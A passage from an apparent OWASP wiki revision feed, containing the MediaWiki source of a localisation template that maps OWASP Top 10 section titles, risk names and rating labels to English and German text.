        | vulnerableTo =                  Am I Vulnerable To {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }}?&lt;br /&gt;
        | vulnerableTo1 =                 Am I Vulnerable To&lt;br /&gt;
        | vulnerableTo2 =                 ?&lt;br /&gt;
        | howPrevent =                    How Do I Prevent {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }}?&lt;br /&gt;
        | howPrevent1 =                   How Do I Prevent&lt;br /&gt;
        | howPrevent2 =                   ?&lt;br /&gt;
        | exampleScenarios =              Example Attack Scenarios &lt;br /&gt;
        | defendingOption =               Defending Option&lt;br /&gt;
        | against =                       against&lt;br /&gt;
        | userImpact =                    Impact to the User &amp;lt;noinclude&amp;gt;&amp;lt;!-- not used, yet --&amp;gt;  &lt;br /&gt;
        &amp;lt;!-- END of Section for SubsectionAdvancedTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | external =                      External &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | myUnused =                      ERROR in the 'Language File' (Use of the unused Object)&lt;br /&gt;
        | #default =                      ERROR in the 'Language File' (Use of an unknown Object)&lt;br /&gt;
     }} &amp;lt;!-- End of English --&amp;gt;&lt;br /&gt;
}}&amp;lt;/onlyinclude&amp;gt;&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Template:Top_10:LanguageFile&amp;diff=230574</id>
		<title>Template:Top 10:LanguageFile</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Template:Top_10:LanguageFile&amp;diff=230574"/>
				<updated>2017-06-13T02:23:41Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;!----------------------------------------------------------------------------&amp;gt; &lt;br /&gt;
&amp;lt;!-- This File contains all the text that is used by OWASP Top 10 Templates --&amp;gt;&lt;br /&gt;
&amp;lt;!--             Please add a new language solely here!!!                   --&amp;gt;&lt;br /&gt;
&amp;lt;!----------------------------------------------------------------------------&amp;gt;&lt;br /&gt;
==='''Usage:''' ===&lt;br /&gt;
This File contains all the text that is used by OWASP Top 10 Templates&amp;lt;br/&amp;gt;&lt;br /&gt;
Please leave a message to {{Template:Contact | name = Torsten Gigler | email =torsten.gigler@owasp.org | username = T.Gigler}} &lt;br /&gt;
if you liked to add a new localization&amp;lt;br&amp;gt;                     &lt;br /&gt;
&amp;lt;!---       Please add a new language solely here!!!                   --&amp;gt;&lt;br /&gt;
If you use an undefined language you will get English output (default language).&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;{{Top_10:LanguageFile&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
:&amp;lt;nowiki&amp;gt;  |text=&amp;lt;parameter&amp;gt; &amp;lt;!-- take one of the defined parmeters, e.g. tableOfContents --&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
:&amp;lt;nowiki&amp;gt;  |language=&amp;lt;your language&amp;gt;   &amp;lt;!-- actually only English (=en) and German (=de) are valid parameters) --&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
:&amp;lt;nowiki&amp;gt;  |year=&amp;lt;year&amp;gt;   &amp;lt;!-- optional for some texts --&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;}}&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
====Example:====&lt;br /&gt;
&amp;lt;nowiki&amp;gt;{{Top_10:LanguageFile|text=tableOfContents|language=de}} =&amp;gt;&amp;lt;/nowiki&amp;gt; {{Top_10:LanguageFile|text=tableOfContents|language=de}}&lt;br /&gt;
----&lt;br /&gt;
==='''Healthcheck'''===&lt;br /&gt;
tbd.&amp;lt;br/&amp;gt;&lt;br /&gt;
In the meantime, please check:&lt;br /&gt;
* [[Top_10_2013-Table_of_Contents | English Top 10 Wiki]]&lt;br /&gt;
* [[Germany/Projekte/Top_10-2013-Inhaltsverzeichnis | German Top 10 Wiki]]&lt;br /&gt;
----&lt;br /&gt;
If you use an unknown parameter you will get the following Error message in your wiki page:&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!---       Please add a new language solely here!!!                   --&amp;gt;&lt;br /&gt;
&amp;lt;onlyinclude&amp;gt;{{#switch: {{{language}}}&lt;br /&gt;
   | de = &amp;lt;!-- German --&amp;gt;&lt;br /&gt;
     {{#switch: {{{text}}} &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN Document-Root --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | documentRootTop10 =                 Germany/Projekte/Top 10-{{{year}}}&lt;br /&gt;
        | documentRootTop10DeveloperEdition = Germany/Projekte/Top 10 fuer Entwickler-{{{year}}}&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END Document-Root --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for Top 10 2013-CenterLinkTemplate + Top 10 2013:Top and Bottom(Advanced)Template(s) --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | top10TmpMessage =               ==BAUSTELLE! Hier entsteht das deutsche Wiki der OWASP Top 10-2013==&lt;br /&gt;
        | top10TmpMessageDeveloperEdition = ==BAUSTELLE! Hier entsteht das deutsche Wiki der OWASP Top 10 fuer Entwickler-2013==&lt;br /&gt;
        | centerLink1 =                   [[Germany/Projekte/Top 10-2013-Inhaltsverzeichnis|2013 Inhaltsverzeichnis]]&lt;br /&gt;
        | centerLink2 =                   [[Germany/Projekte/Top 10-2013-Top 10|2013 Die Top-10-Risiken]]&lt;br /&gt;
        | centerLink1DeveloperEdition =   [[Germany/Projekte/Top 10 fuer Entwickler-2013/Inhaltsverzeichnis|Top 10 fuer Entwickler-2013: Inhaltsverzeichnis]]&lt;br /&gt;
        | centerLink2DeveloperEdition =   [[Germany/Projekte/Top 10 fuer Entwickler-2013/Top 10|Die Top-10-Risiken]]&lt;br /&gt;
        | projectCategory =               [[Category: Germany/Projekte/Top 10-2013]]&lt;br /&gt;
        | projectCategoryDeveloperEdition = [[Category:OWASP Top 10 fuer Entwickler]] [[Category: Germany/Projekte/Top 10 fuer Entwickler-2013]]&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Top Ten Section for Top 10 2013-CenterLinkTemplate --&amp;gt; &lt;br /&gt;
        &amp;lt;!-- BEGIN main Document --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | tableOfContents =               Inhaltsverzeichnis&lt;br /&gt;
        | foreword =                      Vorwort&lt;br /&gt;
        | forewordTranslation =           Vorwort der deutschen Übersetzung&lt;br /&gt;
        | forward =                       Vorwort &amp;lt;!--- behobener Fehler im englischen Original ---&amp;gt;&lt;br /&gt;
        | forwardTranslation =            Vorwort der deutschen Übersetzung &amp;lt;!--- behobener Fehler im englischen Original ---&amp;gt;&lt;br /&gt;
        | aboutOWASP =                    Über OWASP&lt;br /&gt;
        | copyrightAndLicense             Copyright und Lizenz&lt;br /&gt;
        | introduction =                  Einleitung&lt;br /&gt;
        | releaseNotes =                  Neuerungen&lt;br /&gt;
        | risks =                         Risiken&lt;br /&gt;
        | risk =                          Risiko&lt;br /&gt;
        | subTitleApplicationRisks =      (Sicherheitsrisiken für Anwendungen)&lt;br /&gt;
        | riskLarge =                     RISIKO&lt;br /&gt;
        | applicationSecurityRisks =      Was sind Sicherheitsrisiken für Anwendungen? &lt;br /&gt;
        | theTop10 =                      Die Top-10-Risiken&lt;br /&gt;
        | top10 =                         Top 10&lt;br /&gt;
        | whatsNextforDevelopers =        Nächste Schritte für Software-Entwickler&lt;br /&gt;
        | whatsNextforVerifiers =         Nächste Schritte für Prüfer&lt;br /&gt;
        | whatsNextforOrganizations =     Nächste Schritte für Organisationen&lt;br /&gt;
        | noteAboutRisks =                Anmerkungen zum Risikobegriff&lt;br /&gt;
        | detailsAboutRiskFactors =       Details zu Risiko-Faktoren&lt;br /&gt;
        | appendix =                      Anlage&lt;br /&gt;
        | warnings =                      Zur Beachtung&lt;br /&gt;
        | acknowledgements =              Danksagung&lt;br /&gt;
        | attribution =                   Namensnennung/Danksagung&lt;br /&gt;
        | whatChangedFrom2010to2013 =     Was hat sich von Version 2010 zu 2013 verändert?&lt;br /&gt;
        | welcome =                       Herzlich Willkommen&lt;br /&gt;
        | whatAreApplicationSecurityRisks =          Was sind Sicherheitsrisiken für Anwendungen?&lt;br /&gt;
        | whatsMyRisk =                   Was sind &amp;lt;u&amp;gt;meine&amp;lt;/u&amp;gt; Risiken?&lt;br /&gt;
        | references =                    Referenzen&lt;br /&gt;
        | establishAndUseAFullSetOfCommonSecurityControls = Etablierung und Nutzung umfassender Sicherheitsmaßnahmen&lt;br /&gt;
        | startYourApplicationSecurityProgramNow =   Starten Sie jetzt mit Ihrem Anwendungssicherheits-Programm!&lt;br /&gt;
        | getOrganized =                  Organisation und Prozesse &lt;br /&gt;
        | codeReview =                    Code-Analyse&lt;br /&gt;
        | securityAndPenetrationTesting = Sicherheits- und Penetrationstests&lt;br /&gt;
        | itsAboutRisksNotWeaknesses =    Es geht nicht um Schwachstellen, sondern um Risiken&lt;br /&gt;
        | top10RiskFactorSummary =        Zusammenfassung der Top 10 Risiko-Faktoren&lt;br /&gt;
        | additionalRisksToConsider =     Weitere zu betrachtende Risiken &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END main Document --&amp;gt; &lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for ByTheNumbersTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | injection =                     Injection&lt;br /&gt;
        | brokenAuthSessionMgmt =         Fehler in Authentifizierung und Session-Management&lt;br /&gt;
        | authentication =                Authentifizierung &amp;lt;!-- short form for 'Broken Authentication and Session Management' ---&amp;gt;&lt;br /&gt;
        | xss =                           Cross-Site Scripting (XSS)&lt;br /&gt;
        | xssShort =                      XSS&lt;br /&gt;
        | insecureDirectObjectReference = Unsichere direkte Objektreferenzen&lt;br /&gt;
        | insecureDOR =                   Unsichere direkte Objektreferenzen&lt;br /&gt;
        | securityMisconfig =             Sicherheitsrelevante Fehlkonfiguration&lt;br /&gt;
        | misconfig =                     Fehlkonfiguration&lt;br /&gt;
        | sensitiveDataExposure =         Verlust der Vertraulichkeit sensibler Daten&amp;lt;noinclude&amp;gt;ex: Sensitive Data Exposure&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | sensData =                      Sens. Data&amp;lt;noinclude&amp;gt;(tbd)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | missingFunctionLevelACL =       Fehlerhafte Autorisierung auf Anwendungsebene &amp;lt;noinclude&amp;gt;(tbd = Missing Function Level Access Control)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | functionAcc =                   Fehlerh. Autorisierung&amp;lt;noinclude&amp;gt;(tbd = Kurzform für Missing Function Level Access Control)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | csrf =                          Cross-Site Request Forgery (CSRF)&lt;br /&gt;
        | csrfShort =                     CSRF&lt;br /&gt;
        | usingVulnerableComponents =     Benutzen von Komponenten mit bekannten Schwachstellen &amp;lt;noinclude&amp;gt;(tbd = Using Components with Known Vulnerabilities)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | vulnComponents =                Komponenten mit Schwachstellen &amp;lt;noinclude&amp;gt;(tbd = vuln. Components)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | unvalidatedRedirectsForwards =  Ungeprüfte Um- und Weiterleitungen&lt;br /&gt;
        | unvalRedirects =                Ungepr. Weiterltg.&lt;br /&gt;
        | insecureCryptographicStorage =  Kryptografisch unsichere Speicherung&lt;br /&gt;
        | failureRestrictUrlAccess =      Mangelhafter URL-Zugriffsschutz&lt;br /&gt;
        | insufficientTLProtection =      Unzureichende Absicherung der Transportschicht&lt;br /&gt;
        | inProgress =                    In Arbeit &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Top Ten Section for ByTheNumbersTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for Top 10:SummaryTableTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSpecific =           Anwendungs-&amp;lt;br&amp;gt;spezifisch&lt;br /&gt;
        | appSpecific =                   Anw.-&amp;lt;br&amp;gt;spezifisch&lt;br /&gt;
        | applicationBusinessSpecific =   Anwendungs-/&amp;lt;br&amp;gt;Geschäftsspezifisch&lt;br /&gt;
        | appBusinessSpecific =           Anw.-/&amp;lt;br&amp;gt;Geschäftsspez. &lt;br /&gt;
        | exploitability =                Ausnutzbarkeit&lt;br /&gt;
        | easy =                          EINFACH&lt;br /&gt;
        | average =                       DURCHSCHNITTLICH&lt;br /&gt;
        | difficult =                     SCHWIERIG&lt;br /&gt;
        | weakness =                      &amp;lt;!-- not used ---&amp;gt; &amp;lt;!-- for table in Top_10_2013-Risk --&amp;gt;&lt;br /&gt;
        | prevalence =                    Verbreitung&lt;br /&gt;
        | veryWidespread =                AUSSERGEWÖHNLICH HÄUFIG&lt;br /&gt;
        | widespread =                    SEHR HÄUFIG&lt;br /&gt;
        | common =                        HÄUFIG&lt;br /&gt;
        | uncommon =                      SELTEN&lt;br /&gt;
        | detectability =                 Auffindbarkeit&lt;br /&gt;
        | impact =                        Auswirkung&lt;br /&gt;
        | severe =                        SCHWERWIEGEND&lt;br /&gt;
        | moderate =                      MITTEL&lt;br /&gt;
        | minor =                         GERING  &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for Top 10:SummaryTableTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SummaryTableHeaderBeginTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | threatAgents =                  Bedrohungsquelle&lt;br /&gt;
        | attackVectors =                 Angriffsvektor&lt;br /&gt;
        | securityWeakness =              Schwachstellen&lt;br /&gt;
        | technicalImpacts =              Technische Auswirkung&lt;br /&gt;
        | businessImpacts =               Auswirkung auf das Unternehmen&lt;br /&gt;
        | threatAgentsImage =             Image:Top 10 de threatAgents.png&lt;br /&gt;
        | attackVectorsImage =            Image:Top 10 de attackVectors.png&lt;br /&gt;
        | securityWeaknessImage=          Image:Top 10 de securityWeakness.png&lt;br /&gt;
        | technicalImpactsImage =         Image:Top 10 de technicalImpacts.png &lt;br /&gt;
        | businessImpactsImage =          Image:Top 10 de businessImpacts.png  &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for SummaryTableHeaderBeginTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for other Images --&amp;gt;        &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSecurityRisksImage = Image:Top 10 de ApplicationSecurityRisks.png &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for other Images --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SubsectionAdvancedTemplate --&amp;gt;          &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | vulnerableTo =                  Bin ich durch {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }} verwundbar?&lt;br /&gt;
        | vulnerableTo1 =                 Bin ich durch&lt;br /&gt;
        | vulnerableTo2 =                 &amp;amp;nbsp;verwundbar?&lt;br /&gt;
        | howPrevent =                    Wie kann ich {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }} verhindern?&lt;br /&gt;
        | howPrevent1 =                   Wie kann ich &lt;br /&gt;
        | howPrevent2 =                   &amp;amp;nbsp;verhindern?&lt;br /&gt;
        | exampleScenarios =              Mögliche Angriffsszenarien &lt;br /&gt;
        | defendingOption =               Verteidigungs-Option&lt;br /&gt;
        | against =                       gegen&lt;br /&gt;
        | userImpact =                    Auswirkung(en) auf den Benutzer &amp;lt;noinclude&amp;gt;&amp;lt;!-- not used, yet --&amp;gt;   &lt;br /&gt;
        &amp;lt;!-- END of Section for SubsectionAdvancedTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt;         &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | external =                      Andere                    &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt;   &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | myUnused =                      FEHLER im 'Language File' (Aufruf des unbenutzten Objekts)&lt;br /&gt;
        | #default =                      FEHLER im 'Language File' (Aufruf des unbekannten Objekts)&lt;br /&gt;
     }} &amp;lt;!-- End of German --&amp;gt;&lt;br /&gt;
&amp;lt;noinclude&amp;gt;&lt;br /&gt;
&amp;lt;!-- English = default; so here is nothing to do --&amp;gt; &lt;br /&gt;
&amp;lt;!-- | en =  --&amp;gt;&lt;br /&gt;
&amp;lt;!-- | us =  --&amp;gt;&lt;br /&gt;
&amp;lt;!-- | gb =  --&amp;gt;&lt;br /&gt;
&amp;lt;/noinclude&amp;gt; | #default = &amp;lt;!-- English --&amp;gt;&lt;br /&gt;
     {{#switch: {{{text}}} &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN Document-Root --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | documentRootTop10 =                 Top 10 {{{year}}}&lt;br /&gt;
        | documentRootTop10DeveloperEdition = Top 10 {{{year}}} Developer Edition&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END Document-Root --&amp;gt;  &lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for Top 10 2013-CenterLinkTemplate + Top 10 2013:Top and Bottom(Advanced)Template(s) --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | top10TmpMessage = &lt;br /&gt;
           {{#switch: {{{year}}} &lt;br /&gt;
             | 2017 =               ==The Top 10-2017 Wiki is under Construction. The Content is Not Finished yet. Edits to this page will be lost. If you wish a change, please file an [https://github.com/OWASP/Top10/issues issue on GitHub]. ==&lt;br /&gt;
             | 2013 =               &amp;lt;noinclude&amp;gt;==The Top 10-2013 Wiki is under Construction. The Content is Not Finished yet==&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
           }}&lt;br /&gt;
        | top10TmpMessageDeveloperEdition =   ==The Top 10-2013 Developer Edition Wiki is under Connstruction. The Content is Not Finished yet==&lt;br /&gt;
        | centerLink1 =                   [[Top 10 {{{year}}}-Table of Contents | {{{year}}} Table of Contents]]&lt;br /&gt;
        | centerLink2 =                   [[Top_10_{{{year}}}-Top 10|{{{year}}} Top 10 List]]&lt;br /&gt;
        | centerLink1DeveloperEdition =   [[Top 10 {{{year}}} Developer Edition-Table of Contents|{{{year}}} Developer Edition-Table of Contents]]&lt;br /&gt;
        | centerLink2DeveloperEdition =   [[Top 10 {{{year}}} Developer Edition-Top 10 List|{{{year}}} Developer Edition-Top 10 List]]&lt;br /&gt;
        | projectCategory =               [[Category:OWASP Top Ten Project]] [[Category:OWASP Top Ten {{{year}}} Project]]&lt;br /&gt;
        | projectCategoryDeveloperEdition = [[Category:OWASP Top Ten {{{year}}} Developer Edition]]&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN main Document --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | tableOfContents =               Table of Contents&lt;br /&gt;
        | foreword =                      Foreword&lt;br /&gt;
        | forewordTranslation =           Foreword of the English Wiki&lt;br /&gt;
        | forward =                       Forward &amp;lt;!--- looks like a repaired issue ---&amp;gt;&lt;br /&gt;
        | forwardTranslation =            Forward of the English Wiki &amp;lt;!--- looks like a repaired issue ---&amp;gt;&lt;br /&gt;
        | aboutOWASP =                    About OWASP&lt;br /&gt;
        | copyrightAndLicense             Copyright and License&lt;br /&gt;
        | introduction =                  Introduction&lt;br /&gt;
        | releaseNotes =                  Release Notes&lt;br /&gt;
        | risks =                         Risks&lt;br /&gt;
        | risk =                          Risk&lt;br /&gt;
        | subTitleApplicationRisks =      (Application Security Risks)&lt;br /&gt;
        | riskLarge =                     RISIK&lt;br /&gt;
        | applicationSecurityRisks =      Application Security Risks&lt;br /&gt;
        | theTop10 =                      The Top 10&lt;br /&gt;
        | top10 =                         Top 10&lt;br /&gt;
        | whatsNextforDevelopers =        What's Next for Developers&lt;br /&gt;
        | whatsNextforVerifiers =         What's Next for Verifiers&lt;br /&gt;
        | whatsNextforSecurityTesting =   What's Next for Security Testing&lt;br /&gt;
        | whatsNextforOrganizations =     What's Next for Organizations&lt;br /&gt;
        | noteAboutRisks =                Note About Risks&lt;br /&gt;
        | OWASPTop10ApplicationSecurityRisks = OWASP Top 10 Application Security Risks&lt;br /&gt;
        | detailsAboutRiskFactors =       Details About Risk Factors&lt;br /&gt;
        | appendix =                      appendix&lt;br /&gt;
        | warnings =                      Warnings&lt;br /&gt;
        | acknowledgements =              Acknowledgements&lt;br /&gt;
        | attribution =                   Attribution&lt;br /&gt;
        | whatChangedFrom2010to2013 =     What Changed From 2010 to 2013?&lt;br /&gt;
        | welcome =                       Welcome&lt;br /&gt;
        | whatAreApplicationSecurityRisks =          What Are Application Security Risks?&lt;br /&gt;
        | whatsMyRisk =                   What's My Risk?&lt;br /&gt;
        | references =                    References&lt;br /&gt;
        | establishAndUseAFullSetOfCommonSecurityControls = Establish &amp;amp; Use Repeatable Security Processes and Standard Security Controls&lt;br /&gt;
        | startYourApplicationSecurityProgramNow =   Start Your Application Security Program Now&lt;br /&gt;
        | establishContinuousApplicationSecurityTesting = Establish Continuous Application Security Testing&lt;br /&gt;
        | getOrganized =                  Get Organized&lt;br /&gt;
        | codeReview =                    Code Review&lt;br /&gt;
        | securityAndPenetrationTesting = Security and Penetration Testing&lt;br /&gt;
        | itsAboutRisksNotWeaknesses =    It's About Risks, Not Weaknesses&lt;br /&gt;
        | top10RiskFactorSummary =        Top 10 Risk Factor Summary&lt;br /&gt;
        | additionalRisksToConsider =     Additional Risks to Consider  &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END main Document --&amp;gt; &lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for ByTheNumbersTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | injection =                     Injection&lt;br /&gt;
        | brokenAuthSessionMgmt =         Broken Authentication and Session Management&lt;br /&gt;
        | authentication =                Authentication &amp;lt;!-- short form for 'Broken Authentication and Session Management' ---&amp;gt;&lt;br /&gt;
        | xss =                           Cross-Site Scripting (XSS)&lt;br /&gt;
        | xssShort =                      XSS&lt;br /&gt;
        | insecureDirectObjectReference = Insecure Direct Object References&lt;br /&gt;
        | insecureDOR =                   Insecure DOR&lt;br /&gt;
        | securityMisconfig =             Security Misconfiguration&lt;br /&gt;
        | misconfig =                     Misconfig&lt;br /&gt;
        | sensitiveDataExposure =         Sensitive Data Exposure&lt;br /&gt;
        | sensData =                      Sens. Data&lt;br /&gt;
        | missingFunctionLevelACL =       Missing Function Level Access Control&lt;br /&gt;
        | functionAcc =                   Function Acc.&lt;br /&gt;
        | csrf =                          Cross-Site Request Forgery (CSRF)&lt;br /&gt;
        | csrfShort =                     CSRF&lt;br /&gt;
        | usingVulnerableComponents =     Using Components with Known Vulnerabilities&lt;br /&gt;
        | vulnComponents =                vuln. Components&lt;br /&gt;
        | unvalidatedRedirectsForwards =  Unvalidated Redirects and Forwards&lt;br /&gt;
        | unvalRedirects =                unval. Redirects&lt;br /&gt;
        | insecureCryptographicStorage =  Insecure Cryptographic Storage&lt;br /&gt;
        | failureRestrictUrlAccess =      Failure to Restrict URL Access&lt;br /&gt;
        | insufficientTLProtection =      Insufficient Transport Layer Protection&lt;br /&gt;
        | brokenAccessControl =           Broken Access Control &lt;br /&gt;
        | insufficientAttackPrevention =  Insufficient Attack Protection &lt;br /&gt;
        | underprotectedAPIs =            Underprotected APIs&lt;br /&gt;
        | accessCtrl =                    Access Ctrl&lt;br /&gt;
        | attackProt  =                   Attack Prot.&lt;br /&gt;
        | ApiProt =                       API Prot.&lt;br /&gt;
        | inProgress =                    In Progress &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Top Ten Section for ByTheNumbersTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for Top 10:SummaryTableTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSpecific =           Application Specific&lt;br /&gt;
        | appSpecific =                   App Specific&lt;br /&gt;
        | applicationBusinessSpecific =   Application / Business Specific  &lt;br /&gt;
        | appBusinessSpecific =           App / Business Specific       &lt;br /&gt;
        | exploitability =                Exploitability&lt;br /&gt;
        | easy =                          EASY&lt;br /&gt;
        | average =                       AVERAGE&lt;br /&gt;
        | difficult =                     DIFFICULT&lt;br /&gt;
        | weakness =                      Weakness &amp;lt;!-- for table in Top_10_2013-Risk --&amp;gt; &lt;br /&gt;
        | prevalence =                    Prevalence&lt;br /&gt;
        | veryWidespread =                VERY WIDESPREAD&lt;br /&gt;
        | widespread =                    WIDESPREAD&lt;br /&gt;
        | common =                        COMMON&lt;br /&gt;
        | uncommon =                      UNCOMMON&lt;br /&gt;
        | detectability =                 Detectability&lt;br /&gt;
        | impact =                        Impact&lt;br /&gt;
        | severe =                        SEVERE&lt;br /&gt;
        | moderate =                      MODERATE&lt;br /&gt;
        | minor =                         MINOR &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for Top 10:SummaryTableTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SummaryTableHeaderBeginTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | threatAgents =                  Threat Agents&lt;br /&gt;
        | attackVectors =                 Attack Vectors&lt;br /&gt;
        | securityWeakness =              Security Weakness&lt;br /&gt;
        | technicalImpacts =              Technical Impacts&lt;br /&gt;
        | businessImpacts =               Business Impacts&lt;br /&gt;
        | threatAgentsImage =             Image:Top 10 threatAgents.png&lt;br /&gt;
        | attackVectorsImage =            Image:Top 10 attackVectors.png&lt;br /&gt;
        | securityWeaknessImage=          Image:Top 10 securityWeakness.png&lt;br /&gt;
        | technicalImpactsImage =         Image:Top 10 technicalImpacts.png &lt;br /&gt;
        | businessImpactsImage =          Image:Top 10 businessImpacts.png &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for SummaryTableHeaderBeginTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for other Images --&amp;gt;        &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSecurityRisksImage = Image:Top_10_2013-appsec-risks.png &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for other Images --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SubsectionAdvancedTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | vulnerableTo =                  Am I Vulnerable To {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }}?&lt;br /&gt;
        | vulnerableTo1 =                 Am I Vulnerable To&lt;br /&gt;
        | vulnerableTo2 =                 ?&lt;br /&gt;
        | howPrevent =                    How Do I Prevent {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }}?&lt;br /&gt;
        | howPrevent1 =                   How Do I Prevent&lt;br /&gt;
        | howPrevent2 =                   ?&lt;br /&gt;
        | exampleScenarios =              Example Attack Scenarios &lt;br /&gt;
        | defendingOption =               Defending Option&lt;br /&gt;
        | against =                       against&lt;br /&gt;
        | userImpact =                    Impact to the User &amp;lt;noinclude&amp;gt;&amp;lt;!-- not used, yet --&amp;gt;  &lt;br /&gt;
        &amp;lt;!-- END of Section for SubsectionAdvancedTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | external =                      External &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | myUnused =                      ERROR in the 'Language File' (Use of the unused Object)&lt;br /&gt;
        | #default =                      ERROR in the 'Language File' (Use of an unknown Object)&lt;br /&gt;
     }} &amp;lt;!-- End of English --&amp;gt;&lt;br /&gt;
}}&amp;lt;/onlyinclude&amp;gt;&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Top_10-2017_A2-Broken_Authentication&amp;diff=229066</id>
		<title>Top 10-2017 A2-Broken Authentication</title>
